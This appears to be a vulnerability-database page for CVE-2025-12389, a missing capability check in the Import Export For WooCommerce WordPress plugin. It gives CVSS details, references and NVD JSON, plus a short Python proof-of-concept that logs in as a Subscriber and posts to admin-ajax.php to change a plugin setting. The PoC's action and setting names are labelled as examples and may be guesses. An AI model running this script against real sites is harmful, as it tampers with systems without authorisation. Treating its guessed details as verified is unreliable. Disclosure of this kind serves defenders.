Security Vulnerability Report
中文
CVE-2025-12389 CVSS 4.3 MEDIUM

CVE-2025-12389

Published: 2025-11-04 05:16:12
Last Modified: 2026-04-15 00:35:42

Description

The Import Export For WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_setting() function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's record setting.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Import Export For WooCommerce < 1.6.2
Import Export For WooCommerce <= 1.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-12389 PoC - Unauthorized setting modification # Target: WordPress site with Import Export For WooCommerce plugin <= 1.6.2 target_url = "http://target-wordpress-site.com/" # Authenticated user with Subscriber role or higher session = requests.Session() # Login as subscriber user login_url = target_url + "wp-login.php" login_data = { "log": "subscriber_username", "pwd": "subscriber_password", "wp-submit": "Log In" } session.post(login_url, data=login_data) # Exploit the missing capability check in update_setting() exploit_url = target_url + "wp-admin/admin-ajax.php" exploit_data = { "action": "iewc_update_setting", # Plugin's AJAX action "setting_name": "export_records_limit", # Example setting "setting_value": "999999" # Malicious value } response = session.post(exploit_url, data=exploit_data) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12389", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:11.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Import Export For WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_setting() function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's record setting."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/import-export-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a93e3f-54c6-4970-96fd-fab0e81f7034?source=cve", "source": "[email protected]"}]}}